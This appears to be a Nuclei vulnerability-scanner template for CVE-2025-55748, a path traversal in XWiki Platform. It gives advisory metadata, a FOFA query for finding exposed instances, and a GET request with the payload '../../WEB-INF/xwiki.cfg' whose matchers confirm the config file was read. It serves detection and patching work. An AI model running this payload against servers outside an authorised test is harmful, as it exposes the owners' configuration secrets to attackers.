id: CVE-2025-55748 info: name: XWiki Platform - Path Traversal author: Redmomn severity: high description: | XWiki Platform 4.2-milestone-2 through 16.10.6 contains a path traversal caused by improper access control in jsx and sx endpoints, letting remote attackers read configuration files, exploit requires no special privileges. impact: | Remote attackers can read sensitive configuration files, potentially exposing critical system information. remediation: | Upgrade to version 16.10.7 or later. reference: - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m63c-3rmg-r2cf - https://github.com/xwiki/xwiki-platform/commit/9e7b4c03f2143978d891109a17159f73d4cdd318#diff-ee78930a9ac5ea586179fe8ab88a5fd58e369d175927d1e88a0b4dbc3ebcbf1eR62 - https://nvd.nist.gov/vuln/detail/CVE-2025-55748 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-55748 epss-score: 0.01652 epss-percentile: 0.74084 cwe-id: CWE-23 metadata: verified: true max-request: 1 fofa-query: app="XWIKI-Platform" tags: cve,cve2025,xwiki,lfi,vuln,vkev http: - method: GET path: - '{{BaseURL}}/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false' matchers: - type: dsl dsl: - 'contains_all(body, "xwiki.editcomment=","xwiki.plugins=","xwiki.encoding=")' - 'status_code == 200' condition: and # digest: 4a0a004730450221008473f7f86dee0bc49b764644495cfe60a7040cabd5f77bb01b73eec071e2f41402205dbd3db8f52de58083b7b6fad68dd21ed07f86cb0b6c2ce93c5c12938fdd6520:922c64590222798bb761d5b6d8e72950